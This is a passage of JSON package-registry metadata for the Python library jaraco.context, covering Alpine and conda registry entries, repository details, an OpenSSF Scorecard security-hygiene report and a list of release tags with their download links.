,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2396,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2025-06-08T15:34:11.898Z","updated_at":"2025-06-08T15:34:11.898Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26323,"maintainers_count":422,"namespaces_count":2,"keywords_count":4638,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1803},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-08-24T05:06:25.345Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":10959788,"name":"jaraco.context","ecosystem":"conda","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2024-10-09T20:17:45.000Z","latest_release_published_at":"2026-01-27T01:37:36.000Z","latest_release_number":"6.1.0","last_synced_at":"2026-04-10T00:03:27.656Z","created_at":"2024-10-09T21:07:46.944Z","updated_at":"2026-08-06T19:26:18.682Z","registry_url":"https://anaconda.org/anaconda/jaraco.context","install_command":"conda install -c anaconda jaraco.context","documentation_url":null,"metadata":{},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos